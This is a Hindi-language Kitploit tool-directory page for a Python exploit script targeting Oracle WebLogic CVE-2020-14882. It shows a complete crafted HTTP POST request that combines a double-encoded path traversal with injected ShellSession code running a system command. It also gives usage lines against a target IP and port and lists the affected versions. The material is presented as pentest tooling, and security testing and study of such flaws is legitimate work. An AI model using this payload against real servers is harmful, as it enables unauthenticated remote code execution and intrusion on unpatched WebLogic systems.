Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Weblogic_Unauthorized-bypass-RCE — Python-आधारित एक्सप्लॉइट स्क्रिप्ट Oracle WebLogic CVE-2020-14882 अनधिकृत बायपास RCE के लिए। कंसोल पोर्टल पर तैयार किए गए HTTP अनुरोधों के माध्यम से प्रमाणीकरण बायपास और रिमोट कोड निष्पादन का परीक्षण करता है। | Kitploit
उपकरण/GitHubGitHub/ludy-dev/weblogic_unauthorized-bypass-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubludy-dev/weblogic_unauthorized-bypass-rce

Weblogic_Unauthorized-bypass-RCE

Python-आधारित एक्सप्लॉइट स्क्रिप्ट Oracle WebLogic CVE-2020-14882 अनधिकृत बायपास RCE के लिए। कंसोल पोर्टल पर तैयार किए गए HTTP अनुरोधों के माध्यम से प्रमाणीकरण बायपास और रिमोट कोड निष्पादन का परीक्षण करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
8115 साल पहलेअभी तक समीक्षित नहीं
साझा करें

(CVE-2020–14882) Weblogic अनधिकृत बाईपास RCE

(CVE-2020-14882) Oracle Weblogic अनधिकृत बाईपास RCE परीक्षण स्क्रिप्ट यह Python3 पर काम करती है।

अनुरोध

root@kitploit:~
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: <Target IP>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 128

_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('ipconfig');");

परीक्षण स्क्रिप्ट pcre के साथ रिस्पॉन्स डेटा की जाँच करती है।

उपयोग

root@kitploit:~
- 7001/tcp (WebLogic डिफ़ॉल्ट पोर्ट)
Oracle Weblogic Auth Bypass RCE(CVE-2020–14882).py <Target IP>

- विशिष्ट पोर्ट/tcp
Oracle Weblogic Auth Bypass RCE(CVE-2020–14882).py <Target IP> <port>

प्रभावित संस्करण

WebLogic 10.3.6.0.0

WebLogic 12.1.3.0.0

WebLogic 12.2.1.3.0

WebLogic 12.2.1.4.0

WebLogic 14.1.1.0.0

PoC

https://github.com/jas502n/CVE-2020-14882

संदर्भ

https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf https://www.tenable.com/blog/cve-2020-14882-oracle-weblogic-remote-code-execution-vulnerability-exploited-in-the-wild

टूल डाउनलोड करें